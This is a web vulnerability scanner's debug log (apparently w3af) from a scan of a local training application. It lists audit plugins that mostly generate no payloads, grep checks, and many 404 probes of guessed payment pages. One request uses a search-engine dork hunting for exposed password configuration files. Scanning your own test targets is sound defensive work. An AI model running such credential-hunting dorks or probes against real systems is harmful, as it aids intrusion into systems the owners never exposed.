send_mutants_in_threads will send 0 HTTP requests (did:8j0N7I1h) [Wed Feb 12 09:37:44 2020 - debug] frontpage.audit(did="hDbuNQwe", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:44 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 120. [Wed Feb 12 09:37:44 2020 - debug] POST http://localhost:9090/inc/validpay.php returned HTTP code "404" (id=1014,from_cache=0,grep=1,rtt=0.15,did=xjbWI7gy) [Wed Feb 12 09:37:44 2020 - debug] POST http://localhost:9090/module/final.php returned HTTP code "404" (id=1006,from_cache=0,grep=1,rtt=0.62,did=07wkr68W) [Wed Feb 12 09:37:45 2020 - debug] POST http://localhost:9090/inc/success.asp returned HTTP code "404" (id=1007,from_cache=0,grep=1,rtt=0.38,did=MJVgkWHq) [Wed Feb 12 09:37:46 2020 - debug] POST http://localhost:9090/servlet/success.php returned HTTP code "404" (id=1011,from_cache=0,grep=1,rtt=0.11,did=mhx6D483) [Wed Feb 12 09:37:46 2020 - debug] POST http://localhost:9090/inc/valid.asp returned HTTP code "404" (id=1017,from_cache=0,grep=1,rtt=0.25,did=cdtHbSsg) [Wed Feb 12 09:37:46 2020 - debug] GET http://localhost:9090/includes/completepayment.php returned HTTP code "404" (id=1019,from_cache=0,grep=1,rtt=0.15,did=H8DT7kGO) [Wed Feb 12 09:37:46 2020 - debug] GET http://localhost:9090/modules/finished.php returned HTTP code "404" (id=1022,from_cache=0,grep=1,rtt=0.10,did=BQHJAOoR) [Wed Feb 12 09:37:46 2020 - debug] frontpage.audit(did="hDbuNQwe",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.31s to run [Wed Feb 12 09:37:46 2020 - debug] RFI using local web server for URL: http://localhost:9090/learn/vulnerability/a8_ides [Wed Feb 12 09:37:46 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 09:37:46 2020 - debug] GET http://localhost:9090/includes/pay.php returned HTTP code "404" (id=1013,from_cache=0,grep=1,rtt=0.25,did=czt3hBtx) [Wed Feb 12 09:37:46 2020 - debug] GET http://localhost:9090/learn/vulnerability/a8_ides returned HTTP code "200" (id=1016,from_cache=0,grep=1,rtt=0.44,did=Lkxgff2R) [Wed Feb 12 09:37:46 2020 - debug] cors_origin.audit(did="Lkxgff2R",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 3.18s to run (0.63s 19% sending HTTP requests) [Wed Feb 12 09:37:46 2020 - debug] POST http://localhost:9090/includes/transactioncomplete.asp returned HTTP code "404" (id=1012,from_cache=0,grep=1,rtt=0.43,did=85pQ3RnE) [Wed Feb 12 09:37:46 2020 - debug] POST http://localhost:9090/module/completepay.php returned HTTP code "404" (id=1018,from_cache=0,grep=1,rtt=0.11,did=Obu38iaG) [Wed Feb 12 09:37:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 121. [Wed Feb 12 09:37:46 2020 - debug] GET http://localhost:9090/learn/vulnerability/a6_sec_misconf returned HTTP code "200" (id=1021,from_cache=0,grep=0,rtt=0.05,did=BS2XA4Jl) [Wed Feb 12 09:37:46 2020 - debug] POST http://localhost:9090/inc/return.asp returned HTTP code "404" (id=1009,from_cache=0,grep=1,rtt=0.12,did=DV6PyPoA) [Wed Feb 12 09:37:46 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 455, 'reject-seen-url': 222, 'reject-out-of-scope': 11, 'accept': 162} [Wed Feb 12 09:37:46 2020 - debug] GET http://localhost:9090/module/paymentsuccess.asp returned HTTP code "404" (id=1020,from_cache=0,grep=1,rtt=0.29,did=jEvnjV9V) [Wed Feb 12 09:37:46 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 455, 'reject-seen-url': 222, 'reject-out-of-scope': 11, 'accept': 162} [Wed Feb 12 09:37:46 2020 - debug] file_upload.audit(did="N0rqjF4S", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:46 2020 - debug] file_upload.audit(did="N0rqjF4S",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.00s to run [Wed Feb 12 09:37:47 2020 - debug] POST http://localhost:9090/inc/paid.php returned HTTP code "404" (id=1015,from_cache=0,grep=1,rtt=0.29,did=ljafKSxC) [Wed Feb 12 09:37:47 2020 - debug] GET http://localhost:9090/servlet/finished.asp returned HTTP code "404" (id=1024,from_cache=0,grep=1,rtt=0.36,did=Yqokr0nm) [Wed Feb 12 09:37:47 2020 - debug] GET http://localhost:9090/servlet/validatepayment.asp returned HTTP code "404" (id=1027,from_cache=0,grep=1,rtt=0.28,did=JB0rLgcP) [Wed Feb 12 09:37:47 2020 - debug] GET http://localhost:9090/includes/payment.php returned HTTP code "404" (id=1025,from_cache=0,grep=1,rtt=0.15,did=wJHYnVF9) [Wed Feb 12 09:37:47 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 122. [Wed Feb 12 09:37:47 2020 - debug] GET http://localhost:9090/module/successful.asp returned HTTP code "404" (id=1023,from_cache=0,grep=1,rtt=0.10,did=lr1xNQBa) [Wed Feb 12 09:37:47 2020 - debug] POST http://localhost:9090/modules/validatepay.asp returned HTTP code "404" (id=1026,from_cache=0,grep=1,rtt=0.43,did=yFPsNsEc) [Wed Feb 12 09:37:47 2020 - debug] csrf.audit(did="EUOBb1Sa", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:47 2020 - debug] csrf.audit(did="EUOBb1Sa",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.00s to run [Wed Feb 12 09:37:47 2020 - debug] deserialization.audit(did="0BI8qPKP", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:47 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:47 2020 - debug] deserialization.audit(did="0BI8qPKP",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.01s to run [Wed Feb 12 09:37:47 2020 - debug] GET http://localhost:9090/modules/trxcomplete.asp returned HTTP code "404" (id=1029,from_cache=0,grep=1,rtt=0.22,did=EwI2xQIV) [Wed Feb 12 09:37:47 2020 - debug] DNS response from DNS server for domain: ajax.googleapis.com [Wed Feb 12 09:37:47 2020 - debug] GET http://localhost:9090/servlet/validation.asp returned HTTP code "404" (id=1031,from_cache=0,grep=1,rtt=0.18,did=gSPY41j9) [Wed Feb 12 09:37:47 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 123. [Wed Feb 12 09:37:47 2020 - debug] os_commanding.audit(did="y2MVkgAh", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:47 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:47 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:8j0N7I1h) [Wed Feb 12 09:37:47 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:47 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:47 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:y2MVkgAh) [Wed Feb 12 09:37:47 2020 - debug] rfi.audit(did="8j0N7I1h",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 1.32s to run [Wed Feb 12 09:37:48 2020 - debug] GET http://localhost:9090/module/final.php returned HTTP code "404" (id=1033,from_cache=0,grep=1,rtt=0.10,did=I2hFXS9q) [Wed Feb 12 09:37:48 2020 - debug] retire.js returned the expected exit code. [Wed Feb 12 09:37:48 2020 - debug] retirejs.grep(uri="http://localhost:9090/") took 55.90s to run [Wed Feb 12 09:37:48 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:48 2020 - debug] retirejs.grep(uri="http://localhost:9090/_vti_inf.html") took 54.99s to run [Wed Feb 12 09:37:48 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:37:48 2020 - debug] serialized_object.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:48 2020 - debug] blank_body.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:48 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:48 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:48 2020 - debug] credit_cards.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:48 2020 - debug] lfi.audit(did="WZz7pA5z", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:48 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:48 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:WZz7pA5z) [Wed Feb 12 09:37:48 2020 - debug] GET http://localhost:9090/modules/validatepayment.php returned HTTP code "404" (id=1030,from_cache=0,grep=1,rtt=0.14,did=60aP8arb) [Wed Feb 12 09:37:48 2020 - debug] retirejs.grep(uri="http://localhost:9090/.listing") took 54.38s to run [Wed Feb 12 09:37:48 2020 - debug] csp.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:48 2020 - debug] dom_xss.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:48 2020 - debug] vulners_db.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:48 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:48 2020 - debug] keys.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:48 2020 - debug] retirejs.grep(uri="http://localhost:9090/wp-login.php") took 52.63s to run [Wed Feb 12 09:37:48 2020 - debug] clamav.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:48 2020 - debug] retirejs.grep(uri="http://localhost:9090/robots.txt") took 48.77s to run [Wed Feb 12 09:37:48 2020 - debug] retirejs.grep(uri="http://localhost:9090/execute.xml") took 26.09s to run [Wed Feb 12 09:37:48 2020 - debug] retirejs.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 25.69s to run [Wed Feb 12 09:37:48 2020 - debug] retirejs.grep(uri="http://localhost:9090/gears_config") took 24.63s to run [Wed Feb 12 09:37:48 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:48 2020 - debug] objects.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:48 2020 - debug] error_500.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:48 2020 - debug] meta_tags.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:48 2020 - debug] password_profiling.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:48 2020 - debug] click_jacking.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:48 2020 - debug] retirejs.grep(uri="http://localhost:9090/sitemanifest.gears") took 23.04s to run [Wed Feb 12 09:37:48 2020 - debug] lang.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:48 2020 - debug] retirejs.grep(uri="http://localhost:9090/filesInCache.json") took 20.88s to run [Wed Feb 12 09:37:48 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:48 2020 - debug] GET http://localhost:9090/servlet/return.php returned HTTP code "404" (id=1032,from_cache=0,grep=1,rtt=0.34,did=eB7Poamh) [Wed Feb 12 09:37:48 2020 - debug] localhost:9090 connection pool stats (free:50 / in_use:3 / max:50 / total:53) [Wed Feb 12 09:37:48 2020 - debug] Connections with more in use time: (084f56a9dda1c119, 0.19 sec) (a5419411797e137e, 0.03 sec) (ff9acc2bc4ba5606, 0.03 sec) [Wed Feb 12 09:37:48 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:48 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:49 2020 - debug] POST http://localhost:9090/includes/completepayment.aspx returned HTTP code "404" (id=1036,from_cache=0,grep=1,rtt=0.46,did=u3Gq4J1a) [Wed Feb 12 09:37:49 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/filesInCache.json") took 0.17s to run [Wed Feb 12 09:37:49 2020 - debug] sqli.audit(did="D4zsavC9", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:49 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:49 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:D4zsavC9) [Wed Feb 12 09:37:49 2020 - debug] GET http://localhost:9090/includes/paid.asp returned HTTP code "404" (id=1028,from_cache=0,grep=1,rtt=0.17,did=WOUHF8fo) [Wed Feb 12 09:37:49 2020 - debug] lfi.audit(did="WZz7pA5z",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.21s to run [Wed Feb 12 09:37:49 2020 - debug] GET http://localhost:9090/servlet/valid.php returned HTTP code "404" (id=1034,from_cache=0,grep=1,rtt=0.21,did=v0zK7YSy) [Wed Feb 12 09:37:49 2020 - debug] url_session.grep(uri="http://localhost:9090/filesInCache.json") took 0.18s to run [Wed Feb 12 09:37:49 2020 - debug] html_comments.grep(uri="http://localhost:9090/filesInCache.json") took 0.19s to run [Wed Feb 12 09:37:49 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/filesInCache.json") took 0.19s to run [Wed Feb 12 09:37:49 2020 - debug] os_commanding.audit(did="y2MVkgAh",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.31s to run [Wed Feb 12 09:37:49 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/filesInCache.json") took 0.21s to run [Wed Feb 12 09:37:49 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 124. [Wed Feb 12 09:37:49 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/filesInCache.json") took 0.21s to run [Wed Feb 12 09:37:49 2020 - debug] POST http://localhost:9090/modules/finished.aspx returned HTTP code "404" (id=1035,from_cache=0,grep=1,rtt=0.35,did=VoAbZfPK) [Wed Feb 12 09:37:49 2020 - debug] strange_reason.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:49 2020 - debug] oracle.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:49 2020 - debug] feeds.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:49 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:49 2020 - debug] ssn.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:49 2020 - debug] strange_headers.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:49 2020 - debug] cache_control.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:49 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:49 2020 - debug] websockets_links.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:37:49 2020 - debug] POST http://localhost:9090/servlet/validatepayment.py returned HTTP code "404" (id=1042,from_cache=0,grep=1,rtt=0.10,did=SS6ISMlY) [Wed Feb 12 09:37:50 2020 - debug] GET http://localhost:9090/servlet/success.php returned HTTP code "404" (id=1040,from_cache=0,grep=1,rtt=0.21,did=aCvSQgcq) [Wed Feb 12 09:37:50 2020 - debug] GET http://localhost:9090/modules/validation.php returned HTTP code "404" (id=1037,from_cache=0,grep=1,rtt=0.20,did=D0yquZMy) [Wed Feb 12 09:37:50 2020 - debug] POST http://localhost:9090/module/successful.py returned HTTP code "404" (id=1045,from_cache=0,grep=1,rtt=0.22,did=jRRGa2pJ) [Wed Feb 12 09:37:50 2020 - debug] error_pages.grep(uri="http://localhost:9090/filesInCache.json") took 0.46s to run [Wed Feb 12 09:37:50 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/filesInCache.json") took 0.01s to run [Wed Feb 12 09:37:50 2020 - debug] POST http://localhost:9090/includes/pay.aspx returned HTTP code "404" (id=1038,from_cache=0,grep=1,rtt=0.14,did=DhKXxbpe) [Wed Feb 12 09:37:50 2020 - debug] GET http://localhost:9090/module/paymentsuccessful.asp returned HTTP code "404" (id=1039,from_cache=0,grep=1,rtt=0.08,did=VPHKH6v0) [Wed Feb 12 09:37:50 2020 - debug] blind_sqli.audit(did="mXRRsRTF", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:50 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:50 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/filesInCache.json") took 0.34s to run [Wed Feb 12 09:37:50 2020 - debug] GET http://localhost:9090/inc/valid.asp returned HTTP code "404" (id=1041,from_cache=0,grep=1,rtt=0.15,did=MndvqUIf) [Wed Feb 12 09:37:50 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:51 2020 - debug] POST http://localhost:9090/modules/trxcomplete.py returned HTTP code "404" (id=1046,from_cache=0,grep=1,rtt=0.17,did=hYzSqts9) [Wed Feb 12 09:37:51 2020 - debug] POST http://localhost:9090/servlet/return.aspx returned HTTP code "404" (id=1044,from_cache=0,grep=1,rtt=0.10,did=4lEZBJEI) [Wed Feb 12 09:37:51 2020 - debug] POST http://localhost:9090/servlet/validation.py returned HTTP code "404" (id=1051,from_cache=0,grep=1,rtt=0.31,did=ZPnnQQRp) [Wed Feb 12 09:37:51 2020 - debug] sqli.audit(did="D4zsavC9",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.30s to run [Wed Feb 12 09:37:51 2020 - debug] blind_sqli.audit(did="mXRRsRTF",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.10s to run [Wed Feb 12 09:37:51 2020 - debug] POST http://localhost:9090/includes/payment.aspx returned HTTP code "404" (id=1050,from_cache=0,grep=1,rtt=0.39,did=GHAhbacp) [Wed Feb 12 09:37:51 2020 - debug] POST http://localhost:9090/servlet/finished.py returned HTTP code "404" (id=1048,from_cache=0,grep=1,rtt=0.21,did=tYSb6IeF) [Wed Feb 12 09:37:52 2020 - debug] POST http://localhost:9090/servlet/valid.aspx returned HTTP code "404" (id=1047,from_cache=0,grep=1,rtt=0.18,did=qcY3O32z) [Wed Feb 12 09:37:52 2020 - debug] phishing_vector.audit(did="N0YCdPQO", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:52 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:52 2020 - debug] generic.audit(did="T7kmk5gw", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:52 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:52 2020 - debug] GET http://localhost:9090/inc/validpay.php returned HTTP code "404" (id=1043,from_cache=0,grep=1,rtt=0.28,did=9Rg73qCp) [Wed Feb 12 09:37:52 2020 - debug] POST http://localhost:9090/module/paymentsuccess.py returned HTTP code "404" (id=1049,from_cache=0,grep=1,rtt=0.42,did=8Al6jbRv) [Wed Feb 12 09:37:52 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 125. [Wed Feb 12 09:37:52 2020 - debug] format_string.audit(did="tBMZcX2B", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:52 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:52 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:tBMZcX2B) [Wed Feb 12 09:37:52 2020 - debug] GET http://localhost:9090/inc/transactioncomplete.php returned HTTP code "404" (id=1053,from_cache=0,grep=1,rtt=0.16,did=Rp1ygjuf) [Wed Feb 12 09:37:52 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 461, 'reject-seen-url': 238, 'reject-out-of-scope': 11, 'accept': 165} [Wed Feb 12 09:37:52 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:N0YCdPQO) [Wed Feb 12 09:37:52 2020 - debug] generic.audit(did="T7kmk5gw",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.00s to run [Wed Feb 12 09:37:52 2020 - debug] GET http://localhost:9090/inc/paid.php returned HTTP code "404" (id=1052,from_cache=0,grep=1,rtt=0.16,did=UrqMmtSR) [Wed Feb 12 09:37:52 2020 - debug] format_string.audit(did="tBMZcX2B",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.01s to run [Wed Feb 12 09:37:52 2020 - debug] websocket_hijacking.audit(did="EikZKIr6", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:52 2020 - debug] GET http://localhost:9090/inc/return.asp returned HTTP code "404" (id=1055,from_cache=0,grep=1,rtt=0.34,did=GPv9ry7V) [Wed Feb 12 09:37:52 2020 - debug] Finished audit.phishing_vector (did=N0YCdPQO) [Wed Feb 12 09:37:52 2020 - debug] phishing_vector.audit(did="N0YCdPQO",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.21s to run [Wed Feb 12 09:37:52 2020 - debug] GET http://localhost:9090/modules/paymentcomplete.php returned HTTP code "404" (id=1054,from_cache=0,grep=1,rtt=0.29,did=FLLCXriv) [Wed Feb 12 09:37:52 2020 - debug] shell_shock.audit(did="J23oyGAU", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:52 2020 - debug] localhost:9090 connection pool stats (free:51 / in_use:2 / max:50 / total:53) [Wed Feb 12 09:37:52 2020 - debug] Connections with more in use time: (ff9acc2bc4ba5606, 0.22 sec) (a5419411797e137e, 0.16 sec) [Wed Feb 12 09:37:52 2020 - debug] GET http://localhost:9090/module/completepay.php returned HTTP code "404" (id=1058,from_cache=0,grep=1,rtt=0.27,did=9avC3im2) [Wed Feb 12 09:37:52 2020 - debug] POST http://localhost:9090/includes/paid.py returned HTTP code "404" (id=1057,from_cache=0,grep=1,rtt=0.34,did=M6ZGkzgu) [Wed Feb 12 09:37:52 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 126. [Wed Feb 12 09:37:53 2020 - debug] GET http://ajax.googleapis.com/ajax/services/search/web?q=site:localhost inurl:zebra.conf intext:password -sample -test -tutorial -download&start=0&rsz=8&v=1.0 returned HTTP code "200" (id=1064,from_cache=0,grep=1,rtt=1.15,did=OqMgujLj) [Wed Feb 12 09:37:53 2020 - debug] websocket_hijacking.audit(did="EikZKIr6",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.19s to run [Wed Feb 12 09:37:53 2020 - debug] memcachei.audit(did="qECcmqsJ", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:53 2020 - debug] GET http://localhost:9090/includes/transactioncomplete.asp returned HTTP code "404" (id=1060,from_cache=0,grep=1,rtt=0.20,did=c0ANMSh6) [Wed Feb 12 09:37:53 2020 - debug] GET http://localhost:9090/includes/validpay.asp returned HTTP code "404" (id=1062,from_cache=0,grep=1,rtt=0.16,did=PNTRn8Km) [Wed Feb 12 09:37:53 2020 - debug] GET http://localhost:9090/modules/validatepay.asp returned HTTP code "404" (id=1065,from_cache=0,grep=1,rtt=0.55,did=rsz6JdZx) [Wed Feb 12 09:37:53 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:53 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:qECcmqsJ) [Wed Feb 12 09:37:53 2020 - debug] POST http://localhost:9090/module/final.aspx returned HTTP code "404" (id=1061,from_cache=0,grep=1,rtt=0.33,did=TfbYnVpi) [Wed Feb 12 09:37:53 2020 - debug] POST http://localhost:9090/inc/validpay.aspx returned HTTP code "404" (id=1066,from_cache=0,grep=1,rtt=0.14,did=vdhvqkW8) [Wed Feb 12 09:37:53 2020 - debug] un_ssl.audit(did="eFFEVdgn", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:53 2020 - debug] GET http://localhost:9090/module/validate.php returned HTTP code "404" (id=1056,from_cache=0,grep=1,rtt=0.15,did=51k5geDC) [Wed Feb 12 09:37:53 2020 - debug] ldapi.audit(did="iQaumj4w", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:53 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:53 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:iQaumj4w) [Wed Feb 12 09:37:53 2020 - debug] buffer_overflow.audit(did="KDyGLAIp", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:53 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:53 2020 - debug] redos.audit(did="KCSKnDGP", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:53 2020 - debug] Invalid JSON format returned by Google, response status needs to be 200, got "The Google Web Search API is no longer available. Please migrate to the Google Custom Search API (https://developers.google.com/custom-search/)" instead. [Wed Feb 12 09:37:53 2020 - debug] memcachei.audit(did="qECcmqsJ",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.12s to run [Wed Feb 12 09:37:54 2020 - debug] un_ssl.audit(did="eFFEVdgn",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] POST http://localhost:9090/inc/valid.py returned HTTP code "404" (id=1069,from_cache=0,grep=1,rtt=0.21,did=FfxIUjyQ) [Wed Feb 12 09:37:54 2020 - debug] POST http://localhost:9090/servlet/success.aspx returned HTTP code "404" (id=1059,from_cache=0,grep=1,rtt=0.21,did=mGKLLJyo) [Wed Feb 12 09:37:54 2020 - debug] buffer_overflow.audit(did="KDyGLAIp",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.00s to run [Wed Feb 12 09:37:54 2020 - debug] ldapi.audit(did="iQaumj4w",uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") took 0.02s to run [Wed Feb 12 09:37:54 2020 - debug] POST http://localhost:9090/modules/validatepayment.aspx returned HTTP code "404" (id=1063,from_cache=0,grep=1,rtt=0.20,did=BREwv7xz) [Wed Feb 12 09:37:54 2020 - debug] POST http://localhost:9090/module/paymentsuccessful.py returned HTTP code "404" (id=1067,from_cache=0,grep=1,rtt=0.23,did=X9JUKYz9) [Wed Feb 12 09:37:54 2020 - debug] global_redirect.audit(did="ODoSvHLQ", uri="http://localhost:9090/learn/vulnerability/a6_sec_misconf") [Wed Feb 12 09:37:54 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" () [Wed Feb 12 09:37:54 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:ODoSvHLQ) [Wed Feb 12 09:37:54 2020 - debug] POST http://localhost:9090/modules/validation.aspx returned HTTP code "404" (id=1068,from_cache=0,grep=1,rtt=0.18,did=6yXPDi0r) [Wed Feb 12 09:37:54 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 127. [Wed Feb 12 09:37:54 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=281 returned HTTP code "200" (id=1070,from_cache=0,grep=0,rtt=1.74,did=avyXEHwP) [Wed Feb 12 09:37:54 2020 - debug] POST http://localhost:9090/inc/transactioncomplete.aspx returned HTTP code "404" (id=1071,from_cache=0,grep=1,rtt=0.30,did=cADP6vxQ) [Wed Feb 12 09:37:54 2020 - debug] GET http://localhost:9090/learn/vulnerability/a6_sec_misconf returned 